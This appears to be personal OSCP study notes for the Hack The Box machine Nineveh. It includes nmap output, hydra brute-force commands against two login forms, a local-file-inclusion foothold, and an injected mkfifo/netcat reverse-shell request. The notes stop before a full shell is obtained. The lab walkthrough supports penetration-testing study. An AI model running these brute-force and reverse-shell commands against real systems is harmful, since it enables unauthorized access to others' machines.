OSCP Notes

HTB Write-up Nineveh

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
port 80 returned nothing but after configuring nineveh.htb to /etc/hosts, I got
ran the gobuster on the site.
Found a login page.
possible usernames - admin , amrois
MySQL in installed..?
tried different sqlmap options but had not luck..?
Trying to crack it with hydra:
hydra -l admin -P ~/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 54
password = 1q2w3e4r5t
http admin page:
notes page has LFI vuln?
include(): it's executing the php codes
This cool trick below encodes the php source code so we can read it
in this case it doesn't work.

HTTPS enum

After performing go buster, I found a phpLiteAdmin v1.9 login form.
interesting warning.
Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114
hydra -l admin -P ~/rockyou.txt nineveh.htb https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:F=Incorrect"

Code execution on the site

now we can execute commands.
Sending it to burp and modify what we send to
GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+>/tmp/f
Got the reverse shell but not tty
cannot complete due to slowness of the machine!